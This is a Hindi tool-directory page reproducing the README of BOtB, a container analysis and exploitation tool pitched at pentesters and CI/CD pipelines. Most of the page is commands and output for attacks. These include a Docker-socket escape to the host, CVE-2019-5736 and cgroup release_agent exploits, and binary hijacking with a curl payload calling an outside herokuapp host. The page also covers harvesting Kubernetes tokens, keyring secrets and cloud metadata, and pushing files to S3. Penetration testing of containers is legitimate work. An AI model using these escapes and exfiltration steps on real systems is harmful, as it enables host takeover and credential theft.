Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
botb — पेंटेस्टर्स और इंजीनियर्स के लिए एक कंटेनर विश्लेषण और शोषण उपकरण। | Kitploit
उपकरण/GitHubGitHub/brompwnie/botb
कंटेनर सुरक्षाभेद्यता विश्लेषणशोषणपोस्ट-शोषणपेनिट्रेशन टेस्टिंगक्लाउड सुरक्षाकंटेनर एस्केप
GitHubbrompwnie/botb

botb

पेंटेस्टर्स और इंजीनियर्स के लिए एक कंटेनर विश्लेषण और शोषण उपकरण।

रिपॉजिटरी देखें
684564 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Github All Releases

बॉक्स से बाहर निकलें (BOtB)

BOtB एक कंटेनर विश्लेषण और शोषण उपकरण है जिसे पेंटेस्टर्स और इंजीनियरों द्वारा उपयोग के लिए डिज़ाइन किया गया है, साथ ही यह सामान्य CI/CD तकनीकों के साथ CI/CD अनुकूल है।

यह क्या करता है?

BOtB एक CLI टूल है जो आपको निम्न की अनुमति देता है:

  • सामान्य कंटेनर कमजोरियों का शोषण करें
  • सामान्य कंटेनर पोस्ट-एक्सप्लॉइटेशन कार्य करें
  • जब कुछ टूल या बाइनरी कंटेनर में उपलब्ध न हों तो क्षमता प्रदान करें
  • कंटेनर डिप्लॉयमेंट का परीक्षण करने के लिए CI/CD तकनीकों के साथ BOtB की क्षमताओं का उपयोग करें
  • उपरोक्त को मैन्युअल या स्वचालित दृष्टिकोण से करें

वर्तमान क्षमताएँ

  • एक्सपोज्ड डॉकर डीमन (docker.sock) के माध्यम से कंटेनर से बाहर निकलना (breakout)
  • CVE-2019-5736 के माध्यम से कंटेनर से बाहर निकलना
  • सक्षम CAPS और SYSCALLS के माध्यम से विशेषाधिकार प्राप्त कंटेनर से बाहर निकलना
  • अनुमेय seccomp प्रोफाइल के माध्यम से Keyctl syscall का दुरुपयोग करके Linux Kernel Keyrings से डेटा निकालना
  • Kubernetes Service Account secrets को पहचानें और उनका उपयोग करने का प्रयास करें
  • मेटाडेटा सेवा एंडपॉइंट्स की पहचान करें जैसे http://169.254.169.254, http://metadata.google.internal/ और http://100.100.100.200/
  • GCP मेटाडेटा एंडपॉइंट्स से मेटाडेटा जानकारी स्क्रैप करें
  • ENV और ProcFS में प्रक्रियाओं में संवेदनशील स्ट्रिंग्स का विश्लेषण और पहचान करें जैसे /Proc/{pid}/Environ
  • UNIX डोमेन सॉकेट खोजें और पहचानें
  • UNIX डोमेन सॉकेट जो HTTP का समर्थन करते हैं, उन्हें पहचानें
  • UNIX डोमेन सॉकेट या किसी इंटरफ़ेस पर Docker Daemon खोजें और पहचानें
  • कस्टम पेलोड के साथ होस्ट बाइनरी को हाईजैक करें
  • CI/CD मोड में कार्रवाई करें और केवल एग्जिट कोड > 0 लौटाएं
  • S3 बकेट में डेटा पुश करें
  • BOtB को हमेशा एग्जिट कोड 0 लौटने के लिए बाध्य करें (गैर-अवरुद्ध CI/CD के लिए उपयोगी)
  • उपरोक्त को CLI तर्कों या YAML कॉन्फ़िग फ़ाइल से करें
  • रिवर्स DNS लुकअप करें

स्थापना

बाइनरीज़

बाइनरीज़ से स्थापना निर्देशों के लिए कृपया रीलीज़ पेज पर जाएं।

Go के माध्यम से

root@kitploit:~
go get github.com/brompwnie/botb

स्रोत से निर्माण

Go के माध्यम से BOtB का निर्माण:

root@kitploit:~
go build

Make के माध्यम से BOtB का निर्माण:

root@kitploit:~
make

उपयोग

BOtB को लक्षित प्लेटफ़ॉर्म के लिए एक बाइनरी में संकलित किया जा सकता है और यह निम्नलिखित उपयोग का समर्थन करता है:

root@kitploit:~
./botb-linux-amd64 -h
-aggr string
        Attempt to exploit RuncPWN (default "nil")
  -always-succeed
        Always set BOtB's Exit code to Zero
  -autopwn
        Attempt to autopwn exposed sockets
  -cicd
        Attempt to autopwn but don't drop to TTY,return exit code 1 if successful else 0
  -config string
        Load config from provided yaml file (default "nil")
  -endpoints string
        Provide a textfile with endpoints to use for test (default "nil")
  -find-docker
        Attempt to find Dockerd
  -find-http
        Hunt for Available UNIX Domain Sockets with HTTP
  -find-sockets
        Hunt for Available UNIX Domain Sockets
  -hijack string
        Attempt to hijack binaries on host (default "nil")
  -k8secrets
        Identify and Verify K8's Secrets
  -keyMax int
         Maximum key id range (default 100000000) and max system value is 999999999 (default 100000000)
  -keyMin int
         Minimum key id range (default 1) (default 1)
  -metadata
        Attempt to find metadata services
  -path string
        Path to Start Scanning for UNIX Domain Sockets (default "/")
  -pwn-privileged string
        Provide a command payload to try exploit --privilege CGROUP release_agent's (default "nil")
  -pwnKeyctl
        Abuse keyctl syscalls and extract data from Linux Kernel keyrings
  -recon
        Perform Recon of the Container ENV
  -region string
        Provide a AWS Region e.g eu-west-2 (default "nil")
  -rev-dns string
        Perform reverse DNS lookups on a subnet. Parameter must be in CIDR notation, e.g., -rev-dns 192.168.0.0/24 (default "nil")
  -s3bucket string
        Provide a bucket name for S3 Push (default "nil")
  -s3push string
        Push a file to S3 e.g Full command to push to https://YOURBUCKET.s3.eu-west-2.amazonaws.com/FILENAME would be: -region eu-west-2 -s3bucket YOURBUCKET -s3push FILENAME (default "nil")
  -scrape-gcp
        Attempt to scrape the GCP metadata service
  -verbose
        Verbose output
  -wordlist string
        Provide a wordlist (default "nil")

BOtB को कॉन्फ़िग पैरामीटर के माध्यम से YAML फ़ाइल से सेटिंग्स लोड करने का निर्देश भी दिया जा सकता है:

root@kitploit:~
#./botb-linux-amd64 -config=cfg.yml
[+] Break Out The Box
[+] Loading Config: cfg.yml
...

निम्नलिखित उपयोग उदाहरण डिफ़ॉल्ट रूप से एक एग्जिट कोड > 0 लौटाएंगे जब एक विसंगति का पता चलता है, इसे "echo $?" द्वारा दर्शाया गया है जो अंतिम निष्पादित कमांड का एग्जिट कोड दिखाता है।

Linux Kernel Keyring Secrets को पहचानें और निकालें जो ठीक से संरक्षित नहीं हैं

मूल लेखक से अधिक जानकारी यहाँ https://www.antitree.com/2020/07/keyctl-unmask-going-florida-on-the-state-of-containerizing-linux-keyrings/

root@kitploit:~
#./botb-linux-amd64 -pwnKeyctl=true -keyMin=0 -keyMax=100000000
[+] Break Out The Box
[*] Attempting to Identify and Extract Keyring Values
[!] WARNING, this can be resource intensive and your pod/container process may be killed, iterate over min and max with 100000000 increments to be safe
[!] Subkey description for key [251133632]: user;0;0;3f010000;brompwnie_secret
[!] Output {
 "KeyId": 13738777,
 "Valid": true,
 "Name": "_ses.e326b8816c24d0ddda6c2c82ecf62ea2302a7239fce2fd104775d154a97fa3d6",
 "Type": "keyring",
 "Uid": "0",
 "Gid": "0",
 "Perms": "3f1b0000",
 "String_Content": "\ufffd\ufffd\ufffd\u000e",
 "Byte_Content": "wP73Dg==",
 "Comments": null,
 "Subkeys": [
  {
   "KeyId": 251133632,
   "Valid": true,
   "Name": "brompwnie_secret",
   "Type": "user",
   "Uid": "0",
   "Gid": "0",
   "Perms": "3f010000",
   "String_Content": "thetruthisialsoreallyliketrees",
   "Byte_Content": "dGhldHJ1dGhpc2lhbHNvcmVhbGx5bGlrZXRyZWVz",
   "Comments": null,
   "Subkeys": null,
   "Output": ""
  }
 ],
 "Output": ""
}
[+] Finished

माउंटेड Kubernetes Service Account Secrets को पहचानें और सत्यापित करें

root@kitploit:~
#./botb-linux-amd64 -k8secrets=true
[+] Break Out The Box
[*] Identifying and Verifying K8's Secrets
[!] Token found at: /var/run/secrets/kubernetes.io/serviceaccount/token
[!] Token found at: /run/secrets/kubernetes.io/serviceaccount/token
[*] Trying:  https://kubernetes.default/api/v1
[!] Valid response with token (xxxxxxxxxx...)on -> https://kubernetes.default/api/v1
[*] Trying:  https://kubernetes.default/api/v1/namespaces
[*] Trying:  https://kubernetes.default/api/v1/namespaces/default/secrets
[*] Trying:  https://kubernetes.default/api/v1/namespaces/default/pods
[*] Trying:  https://kubernetes.default/api/v1
[!] Valid response with token (xxxxxxxxxx...)on -> https://kubernetes.default/api/v1
[*] Trying:  https://kubernetes.default/api/v1/namespaces
[*] Trying:  https://kubernetes.default/api/v1/namespaces/default/secrets
[*] Trying:  https://kubernetes.default/api/v1/namespaces/default/pods
[+] Finished

एक्सपोज्ड Docker Daemon के माध्यम से कंटेनर से बाहर निकलें

यह दृष्टिकोण होस्ट पर एक इंटरैक्टिव TTY में बाहर निकल जाएगा।

root@kitploit:~
#./bob_linux_amd64 -autopwn=true    
[+] Break Out The Box
[+] Attempting to autopwn
[+] Hunting Docker Socks
[+] Attempting to autopwn:  /var/meh
[+] Attempting to escape to host...
[+] Attempting in TTY Mode
./docker/docker -H unix:///var/meh run -t -i -v /:/host alpine:latest /bin/sh
chroot /host && clear
echo 'You are now on the underlying host'
You are now on the underlying host
/ # 

कंटेनर से बाहर निकलें लेकिन CI/CD अनुकूल तरीके से

यह दृष्टिकोण होस्ट पर TTY में बाहर नहीं निकलता बल्कि सफल कंटेनर ब्रेकआउट को इंगित करने के लिए एग्जिट कोड > 0 लौटाता है।

root@kitploit:~
#./bob_linux_amd64 -autopwn=true -cicd=true
[+] Break Out The Box
[+] Attempting to autopwn
[+] Hunting Docker Socks
[+] Attempting to autopwn:  /var/meh
[+] Attempting to escape to host...
[!] Successfully escaped container
[+] Finished

#echo $?
1

कस्टम पेलोड के साथ CVE-2019-5736 का शोषण करें

कृपया ध्यान दें कि इस शोषण के काम करने के लिए, इस परिदृश्य में लक्ष्य कंटेनर में एक प्रक्रिया निष्पादित की जानी चाहिए।

root@kitploit:~
#./bob_linux_amd64 -aggr='curl "https://some.endpoint.com?command=$0&param1=$1&param2=$2">/dev/null 2>&1'
[+] Break Out The Box[!] WARNING THIS OPTION IS NOT CICD FRIENDLY, THIS WILL PROBABLY BREAK THE CONTAINER RUNTIME BUT YOU MIGHT GET SHELLZ...
[+] Attempting to exploit CVE-2019-5736 with command:  curl "https://bobendpoint.herokuapp.com/canary/bobby?command=$0&param1=$
1&param2=$2">/dev/null 2>&1
[+] This process will exit IF an EXECVE is called in the Container or if the Container is manually stopped
[+] Finished

कस्टम पेलोड के साथ होस्ट पर कमांड/बाइनरी को हाईजैक करें

कृपया ध्यान दें कि इसका उपयोग यह परीक्षण करने के लिए किया जा सकता है कि क्या बाहरी संस्थाएं कंटेनर के भीतर कमांड निष्पादित कर रही हैं। उदाहरण हैं Docker Exec और Kubetcl CP।

root@kitploit:~
#./bob_linux_amd64 -hijack='curl "https://bobendpoint.herokuapp.com/canary/bobby?command=$0&param1=$
1&param2=$2">/dev/null 2>&1'
[+] Break Out The Box
[!] WARNING THIS WILL PROBABLY BREAK THE CONTAINER BUT YOU MAY GET SHELLZ...
[+] Attempting to hijack binaries
[*] Command to be used:  curl "https://bobendpoint.herokuapp.com/canary/bobby?command=$0&param1=$1&param2=$2">/dev/null 2>&1
[+] Currently hijacking:  /bin
[+] Currently hijacking:  /sbin
[+] Currently hijacking:  /usr/bin
[+] Finished

UNIX डोमेन सॉकेट खोजें

root@kitploit:~
#./botb-linux-amd64 -find-sockets=true
[+] Break Out The Box
[+] Hunting Down UNIX Domain Sockets from: /
[!] Valid Socket: /var/meh
[+] Finished

#echo $?
1

Docker Daemon खोजें

root@kitploit:~
#./bob_linux_amd64 -find-docker=true
[+] Break Out The Box
[+] Looking for Dockerd
[!] Dockerd DOCKER_HOST found: tcp://0.0.0.0:2375
[+] Hunting Docker Socks
[!] Valid Docker Socket: /var/meh
[+] Finished

#echo $?
1

संवेदनशील स्ट्रिंग्स के लिए ENV और ProcFS Environ का विश्लेषण करें

डिफ़ॉल्ट रूप से BOtB दो शब्दों "secret" और "password" की खोज करेगा।

root@kitploit:~
 ./bob_linux_amd64 -recon=true
[+] Break Out The Box
[+] Performing Container Recon
[+] Searching /proc/* for data
[!] Sensitive keyword found in: /proc/1/environ -> 'PATH=/go/bin:/usr/local/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binHOSTNAME=0e51200113eaTERM=xtermGOLANG_VERSION=1.12.4GOPATH=/gofoo=secretpasswordHOME=/root'
[!] Sensitive keyword found in: /proc/12/environ -> 'GOLANG_VERSION=1.12.4HOSTNAME=0e51200113eaGOPATH=/goPWD=/app/binHOME=/rootfoo=secretpasswordTERM=xtermSHLVL=1PATH=/go/bin:/usr/local/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin_=./bob_linux_amd64OLDPWD=/bin'
[!] Sensitive keyword found in: /proc/self/environ -> 'HOSTNAME=0e51200113eaSHLVL=1HOME=/rootfoo=secretpasswordOLDPWD=/bin_=./bob_linux_amd64TERM=xtermPATH=/go/bin:/usr/local/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binGOPATH=/goPWD=/app/binGOLANG_VERSION=1.12.4'
[!] Sensitive keyword found in: /proc/thread-self/environ -> 'HOSTNAME=0e51200113eaSHLVL=1HOME=/rootfoo=secretpasswordOLDPWD=/bin_=./bob_linux_amd64TERM=xtermPATH=/go/bin:/usr/local/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binGOPATH=/goPWD=/app/binGOLANG_VERSION=1.12.4'
[+] Checking ENV Variables for secrets
[!] Sensitive Keyword found in ENV:  foo=secretpassword
[+] Finished

#echo $?
1

विशिष्ट कीवर्ड्स को स्कैन करने के लिए BOtB को एक शब्दसूची प्रदान की जा सकती है।

root@kitploit:~
#cat wordlist.txt 
moo

# ./bob_linux_amd64 -recon=true -wordlist=wordlist.txt
[+] Break Out The Box
[+] Performing Container Recon
[+] Searching /proc/* for data
[*] Loading entries from: wordlist.txt
[+] Checking ENV Variables for secrets
[*] Loading entries from: wordlist.txt
[+] Finished

# echo $?
0

मेटाडेटा एंडपॉइंट्स के लिए स्कैन करें

BOtB डिफ़ॉल्ट रूप से दो मेटाडेटा एंडपॉइंट्स के लिए स्कैन करता है।

root@kitploit:~
#  ./bob_linux_amd64 -metadata=true                    
[+] Break Out The Box
[*] Attempting to query metadata endpoint: 'http://169.254.169.254/latest/meta-data/'
[*] Attempting to query metadata endpoint: 'http://kubernetes.default.svc/'
[+] Finished

# echo $?
0

BOtB को स्कैन करने के लिए एंडपॉइंट्स की एक सूची भी प्रदान की जा सकती है।

root@kitploit:~
#  cat endpoints.txt 
https://heroku.com

#  ./bob_linux_amd64 -metadata=true -endpointlist=endpoints.txt
[+] Break Out The Box
[*] Loading entries from: endpoints.txt
[*] Attempting to query metadata endpoint: 'https://heroku.com'
[!] Reponse from 'https://heroku.com' -> 200
[+] Finished

# echo $?
1

UNIX डोमेन सॉकेट के लिए स्कैन करें जो HTTP पर प्रतिक्रिया देते हैं

root@kitploit:~
#  ./bob_linux_amd64 -find-http=true
[+] Break Out The Box
[+] Looking for HTTP enabled Sockets
[!] Valid HTTP Socket: /var/run/docker.sock
[+] Finished

GCP मेटाडेटा इंस्टेंस से डेटा स्क्रैप करें

root@kitploit:~
#  ./botb_linux_amd64 -scrape-gcp=true
[+] Break Out The Box
[+] Attempting to connect to:  169.254.169.254:80

[*] Output->
 HTTP/1.0 200 OK
Metadata-Flavor: Google
Content-Type: application/text
Date: Sun, 30 Jun 2019 21:53:41 GMT
Server: Metadata Server for VM
Connection: Close
Content-Length: 21013
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

0.1/meta-data/attached-disks/disks/0/deviceName persistent-disk-0
0.1/meta-data/attached-disks/disks/0/index 0
0.1/meta-data/attached-disks/disks/0/mode READ_WRITE
.....

AWS S3 बकेट में डेटा पुश करें

root@kitploit:~
#  ./bob_linux_amd64 -s3push=fileToPush.tar.gz -s3bucket=nameOfS3Bucket -region=eu-west-2
[+] Break Out The Box
[+] Pushing fileToPush.tar.gz -> nameOfS3Bucket
[*] Data uploaded to: https://nameOfS3Bucket.s3.eu-west-2.amazonaws.com/fileToPush.tar.gz
[+] Finished

विशेषाधिकार प्राप्त कंटेनर से बाहर निकलें

root@kitploit:~
#  ./bob_linux_amd64 -pwn-privileged=hostname
[+] Break Out The Box
[+] Attempting to exploit CGROUP Privileges
[*] The result of your command can be found in /output
[+] Finished
root@418fa238e34d:/app# cat /output 
docker-desktop

BOtB को हमेशा एग्जिट कोड 0 के साथ सफल होने के लिए बाध्य करें

यह गैर-अवरुद्ध CI/CD परीक्षणों के लिए उपयोगी है

root@kitploit:~
#  ./bob_linux_amd64 -pwn-privileged=hostname -always-succeed-true
[+] Break Out The Box
[+] Attempting to exploit CGROUP Privileges
[*] The result of your command can be found in /output
[+] Finished
# echo $?
0

YAML कॉन्फ़िग फ़ाइल के साथ BOtB का उपयोग करना

उदाहरण YAML फ़ाइल cfg.yml

root@kitploit:~
payload: id
verbose: false
always-succeed: true
cicd: false
endpointlist: endpoints.txt
wordlist: wordlist.txt
path: /
mode: find-sockets

उपरोक्त YAML के साथ BOtB चलाएं

root@kitploit:~
#  ./bob_linux_amd64 -config=cfg.yml
[+] Break Out The Box
[+] Loading Config: cfg.yml
[+] Looking for UNIX Domain Sockets from: /
[!] Valid Socket: /tmp/thisisnotasocket.mock
[+] Finished

CI\CD के साथ BOtB का उपयोग करना

BOtB का उपयोग CI\CD तकनीकों के साथ किया जा सकता है जो यह निर्धारित करने के लिए एग्जिट कोड का उपयोग करते हैं कि परीक्षण पास हुए हैं या विफल। नीचे एक शेल स्क्रिप्ट है जो दो BOtB परीक्षण निष्पादित करती है और दो परीक्षणों के एग्जिट कोड का उपयोग शेल स्क्रिप्ट के एग्जिट को सेट करने के लिए किया जाता है। यदि कोई भी दो परीक्षण एग्जिट कोड >0 लौटाता है, तो शेल स्क्रिप्ट निष्पादित करने वाला परीक्षण विफल हो जाएगा।

root@kitploit:~
#!/bin/sh 

exitCode=0

echo "[+] Testing UNIX Sockets"
./bob_linux_amd64 -autopwn -cicd=true
exitCode=$?

echo "[+] Testing Env"
./bob_linux_amd64 -recon=true
exitCode=$?

(exit $exitCode)

उपरोक्त स्क्रिप्ट CI\CD तकनीकों के साथ BOtB का उपयोग करने का एकमात्र तरीका नहीं है, बल्कि इसे स्वयं भी इस्तेमाल किया जा सकता है और शेल स्क्रिप्ट में लपेटे बिना भी। एक उदाहरण YML कॉन्फ़िग होगा:

root@kitploit:~
version: 2
cicd:
  runATest: ./bob_linux_amd64 -autopwn -cicd=true

नीचे Heroku CI के साथ उपयोग किए जा सकने वाले कॉन्फ़िग का एक उदाहरण है:

root@kitploit:~
{
    "environments": {
        "test": {
            "scripts": {
                "test": "./bob_linux_amd64 -autopwn -cicd=true"
            }
        }
    }
}

नीचे Heroku CI के साथ एक रैपर शेल स्क्रिप्ट का उपयोग करने का एक उदाहरण है:

root@kitploit:~
{
    "environments": {
        "test": {
            "scripts": {
                "test": "./bin/testSocksAndEnv.sh"
            }
        }
    }
}


समस्याएँ, बग और सुधार

किसी भी बग के लिए, कृपया एक Issue सबमिट करें। सुधारों की एक लंबी सूची है लेकिन यदि आप BOtB में कुछ जोड़ा देखना चाहते हैं तो कृपया एक Issue सबमिट करें।

संदर्भ और संसाधन

यह टूल समुदाय में दूसरों के योगदान के बिना संभव नहीं होता, नीचे उन संसाधनों की सूची दी गई है जिन्होंने मेरी मदद की है।

  • https://docs.docker.com/engine/security/https/
  • https://kubernetes.io/docs/reference/generated/kubectl/kubectl-commands#cp
  • https://docs.docker.com/engine/reference/commandline/exec/
  • https://github.com/GoogleContainerTools/container-structure-test
  • https://github.com/coreos/clair
  • https://github.com/aquasecurity/docker-bench
  • https://www.cisecurity.org/benchmark/docker/
  • https://github.com/Frichetten/CVE-2019-5736-PoC
  • https://www.twistlock.com/labs-blog/breaking-docker-via-runc-explaining-cve-2019-5736/
  • https://www.twistlock.com/labs-blog/disclosing-directory-traversal-vulnerability-kubernetes-copy-cve-2019-1002101/
  • https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-classic-platform.html
  • https://github.com/wagoodman/dive
  • https://github.com/cji/talks/blob/master/BruCON2018/Outside%20The%20Box%20-%20BruCON%202018.pdf
  • https://github.com/singe/container-breakouts
  • https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/
  • https://zwischenzugs.com/2015/06/24/the-most-pointless-docker-command-ever/

वार्ताएँ और कार्यक्रम

BOtB निम्नलिखित स्थानों पर प्रस्तुत किया जाना निर्धारित है:

  • BSides London 2019 (https://sched.co/PAwB) और स्लाइड्स यहाँ पाई जा सकती हैं https://github.com/brompwnie/bsideslondon2019
  • Blackhat Las Vegas Arsenal 2019 (https://www.blackhat.com/us-19/arsenal/schedule/index.html#break-out-the-box-botb-container-analysis-exploitation-and-cicd-tool-14988)
  • DefCon 27 Cloud Village (https://cloud-village.org/)
  • Blackhat Europe 2019 (https://www.blackhat.com/eu-19/briefings/schedule/index.html#reverse-engineering-and-exploiting-builds-in-the-cloud-17287)
  • DevSecCon London 2019 (https://www.devseccon.com/london-2019/)

लाइसेंस

BOtB एक क्रिएटिव कॉमन्स एट्रिब्यूशन-नॉनकमर्शियल-शेयरअलाइक 4.0 इंटरनेशनल लाइसेंस (http://creativecommons.org/licenses/by-nc-sa/4.0) के तहत लाइसेंस प्राप्त है।

टूल डाउनलोड करें
  • https://github.com/antitree/keyctl-unmask#keyctl-unmask
  • https://www.antitree.com/2020/07/keyctl-unmask-going-florida-on-the-state-of-containerizing-linux-keyrings/